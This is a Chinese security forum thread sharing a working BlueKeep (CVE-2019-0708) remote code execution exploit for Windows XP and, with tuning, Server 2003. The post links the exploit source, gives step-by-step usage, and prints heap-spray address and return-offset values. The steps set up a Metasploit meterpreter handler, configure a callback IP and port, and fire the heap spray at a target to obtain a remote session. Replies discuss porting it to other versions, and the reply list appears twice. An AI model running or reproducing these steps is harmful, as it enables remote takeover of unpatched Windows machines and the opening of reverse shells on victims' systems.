[原创]cve-2019-0708_bluekeep_xp_rce-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]cve-2019-0708_bluekeep_xp_rce

2019-9-29 17:42 8073

[原创]cve-2019-0708_bluekeep_xp_rce

coolboyme

2019-9-29 17:42

8073

https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce

前后花了3个月通过能够找到的各种开源资料，看雪论坛求助，实现了xp下面的稳定利用。03可以利用自己的机器，不具备通用性。

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make

3. 修改config，配置回连ip和端口

192.168.116.133

6000

4. 执行 ./heap_spray 192.168.116.134 (134是xp的地址，内存大于等于2G)

5. msfconsole meterpreter 会得到session

ps:

shellcode/shellcode.asm 是内核shellcode源码，编译以后转成二进制，就是rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b文件了，make的时候会直接编译进程序。

目前仅支持xp，需要xp的内存 >= 2G

如果需要支持2003，需要修改heap_spray.c 里面的 HEAP_SPRAY_ADDRESS 宏地址，经过反复测试，这个地址在03的不同系统版本，不同内存大小是不一样的。但是如果要测试

自己的机器的话，是可以成功在03上利用。不具备通用性。

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

测试03

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make

3. 修改config，配置回连ip和端口

192.168.116.133

6000

4. 执行 ./_2003_heap_spray 192.168.116.135 (135是03的地址，内存大于等于2G)

5. msfconsole meterpreter 会得到session

[竞赛]2024 KCTF 大赛征题截止日期08月10日！

最后于 2019-9-30 11:34 被coolboyme编辑，原因：补充使用说明和源码附件

上传的附件：

cve-2019-0708_bluekeep_rce.zip （1.26MB，126次下载）

收藏・4

免费・4

打赏

最新回复 (16)
Editor 雪币： 20309 活跃值： (61429) 能力值： (RANK：125 ) 在线值：发帖 1373 回帖 4153 粉丝 1586 关注私信	Editor 2019-9-29 17:44 2 楼 0 可以把分享内容都贴过来吗？
L柳柳雪币： 28 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 15 粉丝 0 关注私信	L柳柳 2019-9-29 17:47 3 楼 0 牛逼最后于 2019-9-29 17:48 被L柳柳编辑，原因：
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-9-29 17:55 4 楼 0 Editor 可以把分享内容都贴过来吗？好的，已经贴过来了
王cb 雪币： 9452 活跃值： (6329) 能力值： ( LV12，RANK：470 ) 在线值：发帖 34 回帖 124 粉丝 137 关注私信	王cb 9 2019-9-30 10:13 5 楼 0 太强了,学习一下
xed 雪币： 129 活跃值： (328) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 215 粉丝 2 关注私信	xed 2019-10-1 22:14 6 楼 0 很强。学习了，回头测试一波
yuchi 雪币： 120 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 9 粉丝 0 关注私信	yuchi 2019-10-8 21:48 7 楼 0 配图用的是什么工具？
houjingyi 雪币： 5651 活跃值： (6788) 能力值： ( LV15，RANK：531 ) 在线值：发帖 31 回帖 105 粉丝 299 关注私信	houjingyi 11 2019-10-12 19:16 8 楼 0
肯特君雪币： 760 活跃值： (69) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 15 粉丝 1 关注私信	肯特君 2019-10-13 11:48 9 楼 0 coolboyme 好的，已经贴过来了大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 ……
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-14 09:09 10 楼 0 肯特君大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… MS_120 这个channel在2008/win7 确实用不了。
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 2019-10-20 13:47 11 楼 0 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢
lovetoday 雪币： 2 活跃值： (428) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	lovetoday 2019-10-25 01:03 12 楼 0 ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系统 ...网盘下载。。有py版本..rb版本的吗。。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:29 13 楼 0 wx_哄哄_670 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:30 14 楼 0 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 编译出错是库依赖，简单百度下就能解决了。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:32 15 楼 0 没有rb版本，不打算合入到 msf 里面
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:32 16 楼 0 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 没有rb版本，不打算合入到 msf 里面
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 2019-11-2 14:42 17 楼 0 coolboyme 假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。自定义4种版本。和meterprete一样自己手动选择啊。最多4次不就成功。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

coolboyme

发帖

109

回帖

335

RANK

关注

私信

他的文章

chrome v8漏洞CVE-2023-2033分析

[原创]chrome v8 issue 1486342浅析

[原创]chrome v8漏洞CVE-2020-16040浅析

chrome v8漏洞CVE-2023-3420浅析

[原创]chrome v8漏洞CVE-2021-37975浅析

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
Editor 雪币： 20309 活跃值： (61429) 能力值： (RANK：125 ) 在线值：发帖 1373 回帖 4153 粉丝 1586 关注私信	Editor 2019-9-29 17:44 2 楼 0 可以把分享内容都贴过来吗？
L柳柳雪币： 28 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 15 粉丝 0 关注私信	L柳柳 2019-9-29 17:47 3 楼 0 牛逼最后于 2019-9-29 17:48 被L柳柳编辑，原因：
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-9-29 17:55 4 楼 0 Editor 可以把分享内容都贴过来吗？好的，已经贴过来了
王cb 雪币： 9452 活跃值： (6329) 能力值： ( LV12，RANK：470 ) 在线值：发帖 34 回帖 124 粉丝 137 关注私信	王cb 9 2019-9-30 10:13 5 楼 0 太强了,学习一下
xed 雪币： 129 活跃值： (328) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 215 粉丝 2 关注私信	xed 2019-10-1 22:14 6 楼 0 很强。学习了，回头测试一波
yuchi 雪币： 120 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 9 粉丝 0 关注私信	yuchi 2019-10-8 21:48 7 楼 0 配图用的是什么工具？
houjingyi 雪币： 5651 活跃值： (6788) 能力值： ( LV15，RANK：531 ) 在线值：发帖 31 回帖 105 粉丝 299 关注私信	houjingyi 11 2019-10-12 19:16 8 楼 0
肯特君雪币： 760 活跃值： (69) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 15 粉丝 1 关注私信	肯特君 2019-10-13 11:48 9 楼 0 coolboyme 好的，已经贴过来了大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 ……
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-14 09:09 10 楼 0 肯特君大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… MS_120 这个channel在2008/win7 确实用不了。
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 2019-10-20 13:47 11 楼 0 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢
lovetoday 雪币： 2 活跃值： (428) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	lovetoday 2019-10-25 01:03 12 楼 0 ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系统 ...网盘下载。。有py版本..rb版本的吗。。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:29 13 楼 0 wx_哄哄_670 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:30 14 楼 0 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 编译出错是库依赖，简单百度下就能解决了。
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:32 15 楼 0 没有rb版本，不打算合入到 msf 里面
coolboyme 雪币： 3407 活跃值： (1202) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 109 粉丝 18 关注私信	coolboyme 5 2019-10-25 15:32 16 楼 0 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 没有rb版本，不打算合入到 msf 里面
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 2019-11-2 14:42 17 楼 0 coolboyme 假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。自定义4种版本。和meterprete一样自己手动选择啊。最多4次不就成功。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复